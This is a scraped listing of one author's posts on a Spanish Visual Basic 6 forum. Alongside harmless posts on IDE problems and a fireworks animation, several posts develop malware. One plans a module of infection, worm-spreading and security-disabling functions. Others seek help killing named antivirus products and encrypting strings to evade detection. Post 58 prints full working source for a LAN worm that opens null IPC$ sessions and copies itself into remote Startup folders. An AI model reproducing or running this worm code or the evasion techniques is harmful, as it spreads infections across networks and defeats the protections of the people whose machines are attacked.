|
51
|
Programación / Programación Visual Basic / Problema: Lentitud del IDE de VB6 en WinVista
|
en: 26 Junio 2008, 23:12 pm
|
Pues eso, recién me instalé Windows Vista Ultimate en mi equipo, y me instale el Visual Studio 6.0
Para mi sorpresa, en el momento que estoy diseñando cualquier formulario (mover controles, redimensionar controles de cualquier tipo, etc...) se produce una lentitud brutal! Haciendo que el diseño de los formularios resulte irritante.
Alguien con Windows Vista tiene los mismos síntomas? Si alguien usa Windows Vista + Visual Studio 6.0 y no le ocurre, que me diga que service Pack tiene y su configuración.
Saludos y gracias!!
|
|
|
52
|
Programación / Programación Visual Basic / [+] Proyecto Open Source: MadFunctions
|
en: 22 Enero 2008, 00:58 am
|
MadFunctions.basQue es esto?La idea es programar un módulo para VB6 (*.bas) que pueda ser agregado a cualquier proyecto, este módulo irá orientado a la programación de ' malware' en general y facilitará muchísimo la tarea del programador a la hora de implementar las típicas funciones que todo ' malware' devería tener. Que funciones se integrarán en MadFunctions.bas?Pues os dejo un listado de las funciones que a día de hoy 22/01/08 voy a implementar, algunas de ellas ya estás hechas (y publicadas en este foro) y otras me falta terminarlas, aquí el listado, el nombre de las funciones (así como sus argumentos) lo describen todo xD '1) Infection Functions Private Sub infect_HardDrive(ByVal DriveLetter As String) As Integer Private Sub infect_USBDrive() As Integer Private Sub infect_NetBiosLan(ByVal SubNet As String) As String Private Sub infect_File(ByVal FilePath As String) As Boolean Private Sub infect_ZipFile(ByVal ZipPath As String) As Boolean Private Sub infect_RarFile(ByVal RarPath As String) As Boolean '2) Spreading Worms Functions Private Sub spread_MSN() As Boolean Private Sub spread_Yahoo() As Boolean Private Sub spread_GTalk() As Boolean Private Sub spread_Skype() As Boolean Private Sub spread_P2P() As Boolean '3) Locking Functions Private Sub lock_Regedit() As Boolean Private Sub lock_SysRestore() As Boolean Private Sub lock_SecurityCenter() As Boolean Private Sub lock_Firewall() As Boolean Private Sub lock_SysUpdates() As Boolean Private Sub lock_IEOptions() As Boolean Private Sub lock_TaskMgr() As Boolean '4) Deleting Functions Private Sub delete_File(ByVal FilePath As String) As Boolean Private Sub delete_FileSecure(ByVal FilePath As String) As Boolean Private Sub delete_AllFolders(ByVal FolderPath As String) As Boolean '5) Managing Process/Services Private Sub kill_Process(ByVal ProcessName As String) As Integer Private Sub kill_Service(ByVal ServiceName As String) As Integer '6) Internet Functions Private Sub get_PublicIP() As String Private Sub get_PrivateIP() As String Private Sub download_File(ByVal ULR As String) As Boolean Private Sub kill_Google() As Boolean '7) FTP Functions Private Sub ftp_Upload(ByVal ftpServer As String, ByVal ftpLogon As String, ByVal ftpPass As String, ByVal FileUploadPath As String) As Boolean Private Sub ftp_Download(ByVal ftpServer As String, ByVal ftpLogon As String, ByVal ftpPass As String, ByVal FileDoenloadPath As String) As Boolean '8) Self Funtions Private Sub MeltFile() Private Sub isMutexRunning() As Boolean '9) Net/Lan Functions Private Sub net_ShareFolder(ByVal FolderPath As String, ByVal SharedName As String) As Boolean Private Sub net_Folder2Drive(ByVal FolderPath As String, ByVal DriveLetter As String) As Boolean '10) Attributes knoking Functions Private Sub change_IncreaseBytes(ByVal FilePath As String, ByVal HowManyBytes As String) As Boolean Private Sub change_VanishFile(ByVal FilePath As String) As Boolean Private Sub change_DateMod(ByVal FilePath As String) As Boolean '11) System Functions Private Sub system_Shutdown() Private Sub system_Logoff()
Ojo, faltan las funciones de FileCopy (para copiar ficheros o nuestro ejecutable) y las de Autorun (aquí hay mucho que exprimir), se está barajando la opción de añadir funciones de ADS (Alternate Data Streams), pero no sé aun... Éste va a ser el listado definitivo de las funciones?No, tengo que hacer una encuesta, ya que muchas de las funciones actualmente expuestas rozan la ilegalidad y pueden estar fuera del Hacking Ético (por ejemplo las funciones de Spreading Worms o las de Infección de Ficheros, Discos USB, Redes Completas, etc...). La encuesta será lanzada en pocos días. Puedo contribuir, aportando ideas, aportando funciones, etc?Sí, aunque me guste programar este tipo de cosas, una ayuda nunca viene mal, si tienes cualquier idea, sugerencia, rectificación, mejora, ... o si tienes alguna función creada por ti mismo que desearías incluir aquí: por favor exprésalo en este post para que todos decidamos si incluirlo o no.
Por el momento os pido que miréis el listado actual y opinéis, si debemos quitar/añadir algo, ideas, mejoras, etc... Se buscan Beta-Testers para probar alguna de las funciones bajo circunstancias poco comunes (En Windows 2000, sin privilegios de Administrador, bajo ciertos AntiVirus, etc...) Saludos, vuestro amigo cojonudo: ||MadAntrax||
|
|
|
53
|
Programación / Programación Visual Basic / [Plug-In] - Utiliza el MouseWheel en el IDE de VB6
|
en: 6 Enero 2008, 01:30 am
|
Si alguien más se ha dado cuenta, sabrá que en el IDE de VB6 no se puede utilizar el MouseWheel. IDE: Entorno de Desarrollo, el editor de Visual Studio 6.0Resulta muy incomodo estar trabajando en un proyecto en el que tengas mucho código escrito y tengas que desplazarte por él usando la barra lateral, ahora con este sencillo plug-in podrás usar tu MouseWheel. El creador del Plug-in se llama Joe Bott y en su web podrás descargarte esta aplicación (y algunas utilidades más), junto con el Source Code completo escrito en C++ (curioso que un programador de C++ haga esto para el IDE de VB6, ¿no? xD) http://www.joebott.com/vb6scrollwheel.htmFuncionamiento: Descomprimir el fichero (tiene una DLL y un EXE), poner los 2 ficheros en una misma carpeta y ejecutar el EXE (se quedará el icono de un ratón rojo en el área de notificación). Abrir el IDE de VB6 y... ¡a programar! Yo tengo la DLL y el EXE copiados en C:\Windows\System32 y he añadido el acceso directo del programa a la carpeta Inicio de Windows para que se ejecuta sólo (recomendado).
Sé que hay otras mejoras para habilitar el MouseWheel, incluso Microsoft ha publicado un boletín sobre como solucionar este "fallo", pero yo personalmente prefiero usar el método del amigo Joe Bott, que se ha molestado en programarlo y compartirlo con todos nosotros. Saludos!!
|
|
|
54
|
Programación / Programación Visual Basic / Ayuda: Programar módulos para un AV-Killer
|
en: 14 Octubre 2007, 00:59 am
|
Hola gente, cuanto tiempo!! Bueno, he estado liado con algunos temas personales pero ya vuelvo ha estar por aquí. He retomado el proyecto del Cactus Joiner y actualmente me estoy centrando en los módulos de AV-Killer para integrarlo todo en el Stub. Os dejo una Screen de lo que llevo hecho: Ese es el listado que he pensado incluir en esta versión del Cactus, de momento he podido desactivar por código, todos los AV's que aparecen en la imagen excepto: - Kaspersky 7.0: No encuentro la forma de detenerlo
- Norton 2007: No encuentro la forma de detenerlo
- Panda Internet Security: No lo tengo instalado, no podido probar de deshabilitarlo
- BitDefender v10: No lo tengo instalado, no podido probar de deshabilitarlo
- AVG Free 7.5: Lo consigo deshabilitar pero requiere un reinicio del sistema.
- Trend Micro PC-Cillin 2007: Lo tengo instalado y estoy trabajando actualmente con él.
Todos los demás (Nod32, McAffe, Avira, avast!, OnCare, etc...) los he conseguido deshabilitar a través de código VB6 y en menos de 5 segundos. Alguien se anima y me ayuda a encontrar el método para los demás AntiVirus? Muchisimas gracias!! Saludos!!
|
|
|
55
|
Programación / Programación Visual Basic / Necesito opinión sobre una futura GUI
|
en: 1 Agosto 2007, 19:51 pm
|
Hola a todos!! Bueno, he vuelto de mis mini-vacaciones y ando un poco oxidado ya xD Estuve pensando en algún nuevo proyecto y se me ha ocurrido crear un Auto-Encriptador de Strings para proyectos creados con VB6. Algunos pensareis: ¿que demonios es eso? o ¿para que demonios quiero yo eso? xD Bueno, tiene una fácil respuesta, como programador de malware (en general) que soy, lo que más me molesta es ver como mis nuevas creaciones se vuelven fácilmente detectables por los AV's por culpa de las String's estáticas que hay en los proyectos, ejemplo: CreateRegKey("HKLM\Software\Microsoft\Windows\Current Version\Run", "update") Esa String es muy típica encontrarla en cualquier malware y los AV's lo detectan de forma inmediata con solo leer el código en hexadecimal de nuestro ejecutable. Para evitar esta heurística tenemos que cifrar cada String con una función (XOR es la más común) y esta tarea (al menos para mí) resulta muy molesta (sobre todo cuando tienes 200 String's para cifrar. Otros ejemplos válidos serían: "virus", "botnet", "hack", "trojan" etc... Algunos Antivirus detectan y catalogan como virus a cualquier fichero que en su interior se encuentre escritas alguna de esas frases.
Bien, pues mi proyecto lo que hace es bien sencillo, le pasamos la ruta donde está nuestro código fuente original y éste lo modifica y cifra TODAS las Strings que queramos de forma automática, rápida y efectiva, con 1 solo golpe de ratón. ¿Os gusta la idea? a mí al menos si xD Bien, pues ya tengo la GUI terminada y necesito saber si es muy fea, muy wapa, poco apropiada, muy cargada, etc... Me he inspirado en un proyecto que ví en pscode.com hace muchísimo tiempo y los colores los he sacado de la GUI del troyano Sub7 Gold. He hecho la foto sobre un fondo negro para que se aprecie el color del borde. Pues eso, solo necesito saber si continuo adelante con esta GUI o queréis que la cambie un poco (otros colores, en 3D en ves de Flat, etc...). Aprovecho para pedir sugerencias o mejoras para añadir al proyecto. Saludos y grácias!!
|
|
|
56
|
Programación / Programación Visual Basic / [Source] Fireworks++ - Lanza petardos y cohetes en VB6 (MEJORADO!!)
|
en: 16 Julio 2007, 23:33 pm
|
Bueno, aquí el remate final. El Source no es mío, la librería usada para el efecto de "niebla" es sencillamente BRUTAL! 1) Mejorado los efectos de niebla 2) Se han añadido nuevas fórmulas matemáticas para simular petardos 3) Funciona con MouseClick o Random 4) Es wapisimo!! xD Adjunto source y versón compilada. NO EJECUTAR ESTE SOURCE DIRECTAMENTE DESDE EL VB6, TENÉIS QUE COMPILARLOS (CREAR EL EXE) Y EJECUTARLO DESDE AHÍ. SI LO EJECUTAS DESDE EL VB6 NO FUNCIONA BIEN!
Recomiendo, cuando lo ejecutéis, que pulséis sobre la opción NO y luego hagáis click con el raton encima del cuadro. Saludos!!
|
|
|
57
|
Programación / Programación Visual Basic / [Source] Fireworks - Lanza petardos y cohetes en VB6
|
en: 15 Julio 2007, 18:30 pm
|
Precioso efecto para añadir en nuestro "About Dialog Box" de cualquier aplicación. Lanza petardos y cohetes de forma aleatória y con colores. Utiliza AlphaBending para simular efecto de "petardo" Ojo, el source no es mio, lo encontré en www.pscode.com como un screensaver, he tenido que modificar bastante el código para dejarlo limpio y listo para usarlo. Sencillamente precioso, no utiliza librerías de DX7 ni DLL''s ni OCX''s Private Type Particle X As Single Y As Single Xv As Single Yv As Single Life As Integer Dead As Boolean Color As Long End Type Private Type FireWork X As Single Y As Single Height As Integer Color As Long Exploded As Boolean P() As Particle End Type Private Type BLENDFUNCTION BlendOp As Byte BlendFlags As Byte SourceConstantAlpha As Byte AlphaFormat As Byte End Type Private Declare Function AlphaBlend Lib "msimg32.dll" (ByVal hDC As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal hDC As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal lInt As Long, ByVal BLENDFUNCT As Long) As Long Private Declare Sub RtlMoveMemory Lib "kernel32.dll" (Destination As Any, Source As Any, ByVal Length As Long) Private Declare Function SetPixelV Lib "gdi32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal crColor As Long) As Long Dim BF As BLENDFUNCTION Dim lBF As Long Dim FW() As FireWork Dim FWCount As Integer Dim RocketSpeed As Integer Private Sub StartFireWork() For i = 0 To FWCount If FW(i).Y = -1 Then GoTo MAKEFIREWORK End If Next i FWCount = FWCount + 1 ReDim Preserve FW(FWCount) i = FWCount MAKEFIREWORK: FW(i).X = Int(Rnd * Me.ScaleWidth) FW(i).Y = Me.ScaleHeight FW(i).Height = Rnd * Me.ScaleHeight FW(i).Color = Int(Rnd * vbWhite) FW(i).Exploded = False ReDim FW(i).P(10) End Sub Private Sub DrawFireWork(tFW As FireWork) Dim DeadCount As Integer Dim RndSpeed As Single Dim RndDeg As Single With tFW If .Exploded Then For i = 0 To UBound(.P) If .P(i).Life > 0 Then .P(i).Life = .P(i).Life - 1 .P(i).X = .P(i).X + .P(i).Xv .P(i).Y = .P(i).Y + .P(i).Yv .P(i).Xv = .P(i).Xv / 1.05 .P(i).Yv = .P(i).Yv / 1.05 + 0.05 PSet (.P(i).X, .P(i).Y), .P(i).Color ElseIf .P(i).Life > -40 Then .P(i).Life = .P(i).Life - 1 .P(i).X = .P(i).X + .P(i).Xv + (0.5 - Rnd) .P(i).Y = .P(i).Y + .P(i).Yv + 0.1 .P(i).Xv = .P(i).Xv / 1.05 .P(i).Yv = .P(i).Yv SetPixelV Me.hDC, .P(i).X, .P(i).Y, .P(i).Color Else .P(i).Dead = True DeadCount = DeadCount + 1 End If Next i If DeadCount >= UBound(.P) Then .Y = -1 End If Else .Y = .Y - RocketSpeed If .Y < .Height Then Dim ExplosionShape As Integer ExplosionShape = Int(Rnd * 6) Select Case ExplosionShape Case 0 ''Regular ReDim .P(Int(Rnd * 100) + 100) For i = 0 To UBound(.P) .P(i).X = .X .P(i).Y = .Y .P(i).Life = Int(Rnd * 20) + 20 RndSpeed = (Rnd * 5) RndDeg = (Rnd * 360) / 57.3 .P(i).Xv = RndSpeed * Cos(RndDeg) .P(i).Yv = RndSpeed * Sin(RndDeg) .P(i).Color = .Color Next i .Exploded = True Case 1 ''Smilely ReDim .P(35) ReDim .P(50) ReDim .P(52) For i = 0 To 35 .P(i).X = .X .P(i).Y = .Y .P(i).Life = 50 .P(i).Xv = 3 * Cos(((360 / 35) * (i + 1)) / 57.3) .P(i).Yv = 3 * Sin(((360 / 35) * (i + 1)) / 57.3) .P(i).Color = .Color Next i For i = 36 To 50 .P(i).X = .X .P(i).Y = .Y .P(i).Life = 50 .P(i).Xv = 2 * Cos(((360 / 35) * i + 15) / 57.3) .P(i).Yv = 2 * Sin(((360 / 35) * i + 15) / 57.3) .P(i).Color = .Color Next i With .P(51) .X = tFW.X .Y = tFW.Y .Life = 50 .Xv = 2 * Cos(-55 / 57.3) .Yv = 2 * Sin(-55 / 57.3) .Color = tFW.Color End With With .P(52) .X = tFW.X .Y = tFW.Y .Life = 50 .Xv = 2 * Cos(-125 / 57.3) .Yv = 2 * Sin(-125 / 57.3) .Color = tFW.Color End With .Exploded = True Case 2 ''Star ReDim .P(50) RndDeg = Int(360 * Rnd) For i = 0 To UBound(.P) .P(i).X = .X .P(i).Y = .Y .P(i).Life = 50 .P(i).Xv = (i * 0.1) * Cos(((360 / 5) * (i + 1) + RndDeg) / 57.3) .P(i).Yv = (i * 0.1) * Sin(((360 / 5) * (i + 1) + RndDeg) / 57.3) .P(i).Color = .Color Next i .Exploded = True Case 3 ''Spiral ReDim .P(50) RndDeg = (360 * Rnd) For i = 0 To UBound(.P) .P(i).X = .X .P(i).Y = .Y .P(i).Life = 50 .P(i).Xv = (i * 0.1) * Cos(((360 / 25) * (i + 1) + RndDeg) / 57.3) .P(i).Yv = (i * 0.1) * Sin(((360 / 25) * (i + 1) + RndDeg) / 57.3) .P(i).Color = .Color Next i .Exploded = True Case 4 ''Regular Random ReDim .P(Int(Rnd * 100) + 100) For i = 0 To UBound(.P) .P(i).X = .X .P(i).Y = .Y .P(i).Life = Int(Rnd * 20) + 20 RndSpeed = (Rnd * 5) RndDeg = (Rnd * 360) / 57.3 .P(i).Xv = RndSpeed * Cos(RndDeg) .P(i).Yv = RndSpeed * Sin(RndDeg) .P(i).Color = Int(Rnd * vbWhite) Next i .Exploded = True End Select Else SetPixelV Me.hDC, .X, .Y, vbWhite End If End If End With End Sub Private Sub Form_KeyPress(KeyAscii As Integer) End End Sub Private Sub Form_Load() Randomize RocketSpeed = Int(Rnd * 4) + 2 FWCount = -1 BF.BlendOp = &H0 BF.BlendFlags = 0 BF.AlphaFormat = 0 End Sub Private Sub Timer1_Timer() For i = 0 To FWCount DrawFireWork FW(i) Next i RtlMoveMemory lBF, BF, 4 AlphaBlend Me.hDC, 0, 0, Me.ScaleWidth, Me.ScaleHeight, Picture1.hDC, 0, 0, Picture1.ScaleWidth, Picture1.ScaleHeight, lBF Me.Refresh End Sub Private Sub Timer2_Timer() StartFireWork BF.SourceConstantAlpha = Int(Rnd * 25) Timer2.Interval = Int(Rnd * 500) Label1.ForeColor = FW(i).Color End Sub
Download only for registered users!
|
|
|
58
|
Programación / Programación Visual Basic / [Source] NetBios infection Module (ojo que es peligroso!)
|
en: 14 Julio 2007, 20:56 pm
|
NetBios infection Module 1.0Alguien ha pedido como hacer que nuestra aplicación hecha en VB6 infecte todos los equipos de una LAN de forma automática? Bien, aquí tienes un sencillo módulo que permite hacer tal cosa. Para ello me he aprovechado de las flaquezas del protocolo NetBios, así como el poder de las sesiones nulas al IPC$ para infectar una LAN. Este código es algo peligroso y sólo lo publico como prueba de concepto, el fin de este código es puramente educativo y didáctico, cualquier otro fin que le podáis dar será calificado como ilegal y el autor no se responsabilizará de los efectos causado por él. Para probar esta código es necesario hacerlo bajo unas estrictas medidas de seguridad y bajo un entorno de prueba. Prohibido usarlo en redes de trabajo reales.sin más que añadir... aquí lo tenéis. '##############################################' '# #' '# NetBios LAN Infection Module - version 1.0 #' '# #' '# Made by ||MadAntrax|| #' '# Date: 14/jul/07 #' '# #' '# Happy Coding... ;D #' '##############################################' Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long) Dim WS As CSocketMaster Sub Main() Set WS = New CSocketMaster 'Modulo Winsock de CSocketMaster Dim SelfIP As String 'Nuestra propia IP de la LAN Dim SubNet As String 'Nuestra SubRed, ejemplo: 192.168.1.X Dim SubNetArray As String 'Almacenamos los Hosts de la LAN que son vulnerables Dim BufferIP() As String 'Almacenamos los octetos de nuestra IP SelfIP = WS.LocalIP 'Obtenemos nuestra IP de la LAN BufferIP = Split(SelfIP, ".") 'Partimos los octetos en un Array If UBound(BufferIP) = 3 Then SubNet = BufferIP(0) & "." & BufferIP(1) & "." & BufferIP(2) 'Obtenemos nuestra SubRed: 192.168.1.X SubNetArray = GetAliveHosts(SubNet, BufferIP(3)) 'Obtenemos los Hosts que son vulnerables a NetBios If SubNetArray <> "0" Then 'Comprobamos que hay Hosts vulnerables en nuestra LAN Call GetPrivilegesOnSubNet(SubNet, SubNetArray) 'Obtenemos privilegios sobre los Hosts vulnerables gracias a IPC$ DoEvents 'Esperamos... Call InfectSubnet(SubNet, SubNetArray) 'Infectamos los Hosts vulnerables gracias a C$ End If End If End Sub 'Fin del Código '''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' 'Función que almacena en un array el último octeto de la dirección IP de 'todos los Hosts de la LAN que son vulnerables a NetBios ' 'Ejemplo: 'Supongamos que encontramos estos Hosts ' 192.168.1.5 ' 192.168.1.10 ' 192.168.1.128 ' 192.168.1.200 ' 'Esta función devuelve: "5,10,128,200" ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' Function GetAliveHosts(ByVal SubNet As String, ByVal MyHost As String) As String Dim AliveHosts As String 'Array donde se almacenan los Hosts vulnerables AliveHosts = "" WS.Protocol = sckTCPProtocol 'Establecemos el protocolo en TCP For i = 1 To 254 'Bucle desde X.X.X.1 hasta X.X.X.254 If WS.State <> sckClosed Then WS.CloseSck 'Si el Socket no está cerrado, lo cerramos para evitar errores. DoEvents 'Esperamos... WS.Connect SubNet & "." & i, 135 'Nos conectamos a todos los Hosts de la LAN al puerto 135 TCP (NetBios) Sleep 500 'Esperamos 1/2 Segundo... If WS.State = sckConnected And i <> MyHost Then 'Si el Hosts es vulnerable y el Host no es MiPC entonces... AliveHosts = AliveHosts & i & "," ' añadimos el octeto del Host en el Array End If 'End If Next i If Len(AliveHosts) > 0 Then 'Si hemos encontrado al menos 1 Host vulnerable... AliveHosts = Left(AliveHosts, Len(AliveHosts) - 1) ' quitamos el último caracter del Array (siempre es una ",") para evitar errores. GetAliveHosts = AliveHosts ' devolvemos el Array como valor de retorno Exit Function ' finalizamos esta función End If 'End If GetAliveHosts = "0" 'Si no hemos encontrado ningún Host vulnerable en la LAN, devolvemos "0" End Function ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' 'Función que aprovecha el bug del IPC$ para establecer sesión nula (Null Session) 'en todos los Hosts de la LAN que son vulnerables a NetBios ' 'Ejemplo: 'Supongamos que encontramos estos Hosts ' 192.168.1.128 ' 192.168.1.200 ' 'Esta función ejecuta: ' net use \\192.168.1.128\ipc$ "" /user:"" ' net use \\192.168.1.200\ipc$ "" /user:"" ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' Function GetPrivilegesOnSubNet(ByVal SubNet As String, ByVal SubNetArray As String) Dim tmpArray() As String Dim tmpIP As String tmpArray = Split(SubNetArray, ",") For i = 0 To UBound(tmpArray) tmpIP = "\\" & SubNet & "." & tmpArray(i) & "\ipc$ " Shell "net use " & tmpIP & Chr(34) & Chr(34) & " /user:" & Chr(34) & Chr(34), vbHide Next i 'No es necesario comentar esta función, solo hace un bucle y ejecuta una shell End Function ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' 'Función que copia nuestro ejecutable en la carpeta INICIO de todos los usuarios 'de los Hosts vulnerables a NetBios, para ello utiliza C$ ' 'Ejemplo: 'Supongamos que encontramos estos Hosts ' 192.168.1.128 ' 192.168.1.200 ' 'Esta función ejecuta: ' copy "MiRuta\MiEjecutable.exe" "\\192.168.0.128\c$\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\update.exe" ' copy "MiRuta\MiEjecutable.exe" "\\192.168.0.200\c$\Documents and Settings\All Users\Menú Inicio\Programas\Inicio\update.exe" ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''' Function InfectSubnet(ByVal SubNet As String, ByVal SubNetArray As String) Dim tmpArray() As String Dim tmpIP As String tmpArray = Split(SubNetArray, ",") For i = 0 To UBound(tmpArray) tmpIP = "\\" & SubNet & "." & tmpArray(i) & "\c$\Documents and Settings\All Users\Menú Inicio\Programas\Inicio" Shell "copy " & Chr(34) & App.Path & "\" & App.EXEName & ".exe" & Chr(34) & " " & Chr(34) & tmpIP & "\updater.exe" & Chr(34), vbHide Next i 'No es necesario comentar esta función, solo hace un bucle y ejecuta una shell End Function
Que hace este código?Primero obtiene nuestra IP y toma por defecto que se trata de una red de clase C (255.255.255.0), a partir de aquí crea un bucle desde: X.X.X.1 hasta X.X.X.254 he intenta conectar al puerto 135 de TCP ( NetBios), si lo consigue entonces establece una sesión nula ( net use X.X.X.128ipc$ "" /user:"") para luego copiarse en la carpeta inicio de todos los usuarios bajo la unidad C$Dudas, comentarios, sugerencias, criticas.. aquí porfavor
|
|
|
60
|
Programación / Programación Visual Basic / Felicidades a los 2 nuevos moderadores
|
en: 11 Julio 2007, 15:53 pm
|
Bueno, a uno de ellos ya se presentó: Hendrix en el post de "Moderador Visual Basic 6.0" Y Ahora este subforo se refuerza con el apoyo y dedicación de E0N, que ha demostrado una dedicación, profesionalidad y ética envidiable y por ello se ha ganado el merecido puesto.
Espero que el número de trolls vaya decayendo así como los futuros proyectos de VB vayan en aumento.
Sin más que añadir: Felicidades y bienvenidos Hendrix y E0N
|
|
|
|
|
|
|